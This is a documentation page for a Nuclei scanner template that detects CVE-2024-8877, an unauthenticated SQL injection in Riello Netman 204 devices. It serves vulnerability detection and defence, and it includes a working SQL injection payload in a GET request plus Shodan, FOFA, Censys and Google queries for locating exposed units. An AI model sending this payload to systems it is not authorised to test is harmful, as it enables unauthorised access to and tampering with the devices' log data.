Skip to content
Nuclei Templates

Riello Netman 204 - SQL Injection

ID: CVE-2024-8877

Severity: critical

Author: s4e-io

Tags: cve,cve2024,netman,sqli

Description

Section titled “Description”

The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.

YAML Source

Section titled “YAML Source”
id: CVE-2024-8877


info:
  name: Riello Netman 204 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.
  reference:
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/index.html
    - https://0day.today/exploit/39757
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8877
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8877
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39654
    cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: riello-ups
    product: netman_204_firmware
    shodan-query: title:"netman 204"
    fofa-query: title="netman 204"
    censys-query: services.http.response.body:"netman204"
    google-query: intitle:"netman 204"
  tags: cve,cve2024,netman,sqli


http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "START APPLICATION", "category\":", "codeStr\":")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206a80cb6b44874493af70b2d144c7d14a83144e7085cab9777ee4e318dc53dca2022013f30b7df077a2c5f6c2c262efaafb348ef89a8adf8319fc7ff2da0cd72132e6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8877.yaml"

View on Github